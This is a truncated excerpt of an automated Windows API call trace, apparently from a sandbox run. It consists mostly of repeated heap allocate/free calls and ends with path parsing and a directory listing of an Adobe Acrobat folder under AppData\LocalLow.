hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.415] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.418] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.418] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.419] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.419] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.419] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0097.419] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0097.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0097.420] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.420] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0097.420] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb530 [0097.420] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.420] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0097.420] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.420] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.420] PathFindFileNameW (pszPath="") returned="" [0097.420] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.420] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, 